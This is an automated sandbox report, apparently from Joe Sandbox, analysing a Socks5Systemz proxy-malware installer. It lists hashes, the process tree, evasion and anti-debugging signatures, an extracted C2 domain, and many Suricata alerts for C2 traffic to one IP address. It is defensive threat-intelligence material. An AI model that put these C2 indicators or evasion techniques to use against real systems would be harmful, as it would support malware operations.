Windows Analysis Report
AbC0LBkVhr.exe

Overview

General Information

Sample name: AbC0LBkVhr.exe (renamed because the original name is a hash value)
Original sample name: 038c7d5697bfbe553717357809e621bf.exe
Analysis ID: 1576106
MD5: 038c7d5697bfbe553717357809e621bf
SHA1: 1264a6bc374db430ce8007b99cc6b10ad0f14c9e
SHA256: 71f8685ec48d0623886c9cf10bc1bc806586904c939aa28d20f9a253d45b623f
Tags: exe, Socks5Systemz, user-abuse_ch

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AbC0LBkVhr.exe (PID: 6888 cmdline: "C:\Users\user\Desktop\AbC0LBkVhr.exe" MD5: 038C7D5697BFBE553717357809E621BF)
    • AbC0LBkVhr.tmp (PID: 6932 cmdline: "C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp" /SL5="$20416,3526895,54272,C:\Users\user\Desktop\AbC0LBkVhr.exe" MD5: 2A520A4553D90F23218A97B9476D232A)
      • net.exe (PID: 7100 cmdline: "C:\Windows\system32\net.exe" pause video_capture_solution_11223 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6196 cmdline: C:\Windows\system32\net1 pause video_capture_solution_11223 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • videocapturesolution32.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe" -i MD5: F980DB1C4941DE93EA4A88045D20F6D5)
  • cleanup
Malware configuration: {"C2 list": ["ejvphud.ua"]}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\EShineEncoder\EShineEncoder.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-3B09G.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000004.00000000.1722687638.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000001.00000002.2974303192.0000000005A00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000004.00000002.2974350816.0000000002D09000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: videocapturesolution32.exe PID: 7156 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

Source | Rule | Description | Author | Strings
4.0.videocapturesolution32.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
                    No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T14:53:00.972080+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:04.945392+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:06.672139+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:08.409471+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:10.043993+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:10.695596+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:12.337893+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:13.939702+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:15.552173+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49774 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:17.135660+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49778 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:18.859616+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49781 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:19.478454+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49781 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:21.246296+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:21.856324+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:22.496373+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:23.106741+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:25.816329+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49798 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:27.716440+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:28.327002+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:29.959132+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49811 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:31.620468+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49815 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:33.371099+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49821 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:34.117261+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49821 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:35.744506+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49827 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:37.333697+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49833 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:38.973303+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49837 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:40.596098+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49840 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:42.202730+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:42.800414+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:44.551366+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49852 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:46.194494+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49858 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:47.807861+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49861 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:49.453296+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:50.052934+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:51.727399+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49870 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:53.322584+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:54.934871+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:55.522260+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:57.108278+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:57.707007+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:59.334096+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49894 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:00.963510+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49897 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:02.553198+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49901 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:04.619418+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49907 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:06.313221+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49913 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:07.978534+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49917 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:10.024480+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49922 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:11.689372+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49926 | 147.45.126.31 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T14:53:00.972080+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:04.945392+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:06.672139+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:08.409471+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:10.043993+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:10.695596+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:12.337893+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:13.939702+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:15.552173+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49774 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:17.135660+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49778 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:18.859616+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49781 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:19.478454+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49781 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:21.246296+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:21.856324+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:22.496373+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:23.106741+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:25.816329+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49798 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:27.716440+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:28.327002+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:29.959132+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49811 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:31.620468+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49815 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:33.371099+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49821 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:34.117261+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49821 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:35.744506+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49827 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:37.333697+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49833 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:38.973303+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49837 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:40.596098+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49840 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:42.202730+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:42.800414+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:44.551366+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49852 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:46.194494+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49858 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:47.807861+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49861 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:49.453296+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:50.052934+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:51.727399+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49870 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:53.322584+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:54.934871+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:55.522260+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:57.108278+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:57.707007+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:59.334096+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49894 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:00.963510+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49897 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:02.553198+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49901 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:04.619418+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49907 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:06.313221+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49913 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:07.978534+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49917 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:10.024480+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49922 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:11.689372+0100 | 2050112 | 1 | A Network Trojan was detected | 192.168.2.4 | 49926 | 147.45.126.31 | 80 | TCP

                    AV Detection

Source: videocapturesolution32.exe.7156.4.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["ejvphud.ua"]}
Source: C:\ProgramData\EShineEncoder\EShineEncoder.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | ReversingLabs: Detection: 79%
Source: AbC0LBkVhr.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\EShineEncoder\EShineEncoder.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_0045CFA8 GetProcAddress, GetProcAddress, GetProcAddress, ISCryptGetVersion
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_0045D05C ArcFourCrypt
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_0045D074 ArcFourCrypt
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_10001000 ISCryptGetVersion
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_10001130 ArcFourCrypt

                    Compliance

Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | Unpacked PE file: 4.2.videocapturesolution32.exe.400000.0.unpack
Source: AbC0LBkVhr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Capture Solution_is1
Source: Binary string: msvcp71.pdbx# | source: is-297HU.tmp.1.dr
Source: Binary string: msvcr71.pdb< | source: is-MJRUC.tmp.1.dr
Source: Binary string: msvcp71.pdb | source: is-297HU.tmp.1.dr
Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb | source: is-GSMNO.tmp.1.dr
Source: Binary string: msvcr71.pdb | source: is-MJRUC.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_00452A34 FindFirstFileA, GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_00474D70 FindFirstFileA, FindNextFileA, FindClose
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_00462578 FindFirstFileA, FindNextFileA, FindClose
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_004975B0 FindFirstFileA, SetFileAttributesA, FindNextFileA, FindClose
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_00463B04 SetErrorMode, FindFirstFileA, FindNextFileA, FindClose, SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_00463F80 SetErrorMode, FindFirstFileA, FindNextFileA, FindClose, SetErrorMode

                    Networking

Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49737 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49737 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49755 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49755 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49750 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49750 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49757 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49757 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49765 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49811 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49811 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49774 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49774 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49768 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49768 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49852 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49852 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49789 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49789 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49821 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49815 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49865 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49865 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49765 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49846 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49846 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49821 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49815 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49870 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49870 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49907 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49907 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49858 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49897 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49897 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49876 -> 147.45.126.31:80
